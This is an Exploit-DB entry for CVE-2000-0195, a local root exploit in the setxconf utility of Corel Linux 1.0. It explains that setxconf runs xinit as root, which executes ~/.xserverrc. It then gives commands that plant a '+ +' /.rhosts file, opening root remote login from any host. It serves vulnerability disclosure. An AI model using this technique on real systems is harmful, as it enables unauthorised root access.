Corel Linux OS 1.0 setxconf Vulnerability

ID EDB-ID:19765
Type exploitdb
Reporter suid
Modified 2000-02-24T00:00:00


Corel Linux OS 1.0 setxconf Vulnerability. CVE-2000-0195. Local exploit for linux platform


A vulnerability exists in the setxconf utility, as shipped with Corel Linux 1.0. The -T option to setxconf will run xinit, which euid root. xinit, when executed, will invoke the contents on ~/.xserverrc. A malicious user could therefore execute commands as root.

cat > ~/.xserverrc
echo "+ +" > /.rhosts